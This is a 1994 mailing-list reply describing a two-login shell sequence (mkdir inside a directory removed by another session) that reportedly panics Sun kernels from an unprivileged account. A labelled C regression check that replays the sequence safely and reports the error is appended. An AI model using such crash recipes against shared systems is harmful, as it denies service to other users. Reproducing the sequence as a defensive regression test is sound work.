Re: udp packet storms - ping death

Charles Howes (chowes@helix.net)
Thu, 3 Nov 1994 22:53:49 -0800 (PST)

On Wed, 2 Nov 1994, Perry E. Metzger wrote:

> Charles Howes says:
> > > Our copy of ping is installed setuid root; ...
> > 
> > So you mean that any student at Princeton can panic any Sun there just by
> > typing that command?  Cool...
> 
> There are already so many ways to panic Suns from userland...

Yes, I've found one that's rather easy:

Sign on twice.  Transcript one:
  cd /tmp
  mkdir foo
  cd foo
   (*)
  mkdir bar

Transcript two:  (Executed at '*' in transcript one)
  cd /tmp
  rmdir foo

I don't think you can remove the 'mkdir' part of the kernel without
causing some major problems.

--
Charles Howes -- chowes@helix.net
 Always tell the truth, then you make it the other bloke's problem! 
 - Sean Connery, 1971
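
Added example, not part of the original message: a single-process C regression check that replays the sequence from the two transcripts (enter foo, remove foo by its absolute path, then mkdir bar) and reports how the kernel answers. The function name and the scratch path are constructed for this example; the ENOENT result is what Linux returns, and is an assumption for other systems.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Returns the errno from mkdir() inside a removed working directory,
 * 0 if that mkdir() unexpectedly succeeded, -1 if setup failed. */
int mkdir_in_removed_cwd(void)
{
    char base[] = "/tmp/rmcwd-XXXXXX";      /* constructed scratch path */
    char foo[64];
    int result = -1;
    int saved = open(".", O_RDONLY);        /* lets us restore the caller's cwd */

    if (saved < 0) return -1;
    if (mkdtemp(base) == NULL) { close(saved); return -1; }
    snprintf(foo, sizeof foo, "%s/foo", base);

    if (mkdir(foo, 0700) == 0 && chdir(foo) == 0) {
        /* Transcript two: remove the directory session one is sitting in. */
        if (rmdir(foo) == 0) {
            /* Transcript one after (*): create a child of the dead directory. */
            result = (mkdir("bar", 0700) == 0) ? 0 : errno;
        }
    }
    /* Leave the dead directory before cleaning up the scratch tree. */
    if (fchdir(saved) != 0) result = -1;
    close(saved);
    rmdir(foo);                             /* no-op if already removed */
    rmdir(base);
    return result;
}

int main(void)
{
    int r = mkdir_in_removed_cwd();
    if (r < 0) puts("could not set up the scenario");
    else if (r == 0) puts("mkdir succeeded inside a removed directory");
    else printf("mkdir refused: %s\n", strerror(r));
    return r > 0 ? 0 : 1;
}
```

A clean error return here is the behaviour to expect from a kernel that checks for a removed parent before creating the entry; a return of -1 means the system refused to remove an in-use directory, so the sequence never got that far.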